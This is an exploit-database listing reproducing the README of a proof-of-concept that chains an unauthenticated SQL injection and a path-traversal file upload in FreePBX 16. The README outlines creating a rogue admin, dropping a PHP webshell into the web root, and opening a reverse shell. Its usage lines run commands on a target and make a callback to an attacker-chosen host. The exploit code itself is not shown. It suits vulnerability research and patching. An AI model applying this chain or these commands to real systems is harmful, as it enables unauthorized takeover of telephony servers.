Exploit for Authentication Bypass Using an Alternate Path or Channel in Sangoma Freepbx CVE-2025-57819 CVE-2025-61678

Name: Exploit for Authentication Bypass Using an Alternate Path or Channel in Sangoma Freepbx CVE-2025-57819 CVE-2025-61678
Rating: 5 (1 reviews)

2026-06-06 | CVSS 10.0

## https://sploitus.com/exploit?id=C859A543-A5A3-5864-8659-9856045D369A
# FreePBX 16 — Unauthenticated SQLi to RCE

Proof-of-concept exploit chaining two FreePBX vulnerabilities to go from **zero access** to
**remote code execution** on FreePBX 16.

| CVE | Component | Impact |
|-----|-----------|--------|
| **CVE-2025-57819** | Endpoint module loader (`brand` parameter) | Unauthenticated stacked SQL injection |
| **CVE-2025-61678** | Endpoint Manager firmware uploader (`fwbrand` parameter) | Authenticated arbitrary file upload (path traversal) |

## How it works

1. **Create an admin (CVE-2025-57819)** — a stacked SQL injection reachable without authentication
   via the namespaced endpoint loader is used to `INSERT` a brand-new full-access administrator
   directly into the `ampusers` table.
2. **Authenticate** — the PoC logs into the admin panel as the freshly created user.
3. **Drop a webshell (CVE-2025-61678)** — the Endpoint Manager firmware upload handler is abused
   with a `../../../var/www/html/` traversal in `fwbrand` to write a PHP webshell into the
   web root.
4. **Execute** — run a single command or receive an interactive reverse shell.

## Affected versions

FreePBX 16 (Endpoint module prior to `16.0.92`). Also patched in `17.0.6`.
Update to a fixed release.

## Usage

```bash
# single command
python3 exploit.py --rhost pbx.example.com --command "id"

# interactive reverse shell (auto-listener via pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444

# plain HTTP / custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"
```

### Options

| Flag | Description |
|------|-------------|
| `--rhost` | Target host (required) |
| `--rport` | Target port (default `443`) |
| `--http` | Use HTTP instead of HTTPS |
| `--lhost` / `--lport` | Reverse-shell callback address |
| `--command` | Run a single command instead of a shell |

## Requirements

```bash
pip install requests pwntools
```

## Disclaimer

For authorized security testing and educational purposes only. Use it exclusively on systems you
own or have explicit written permission to test. The author assumes no liability for misuse.

---
linkedin: ehxb · medium.com/@Ehxb · github 0xEhxb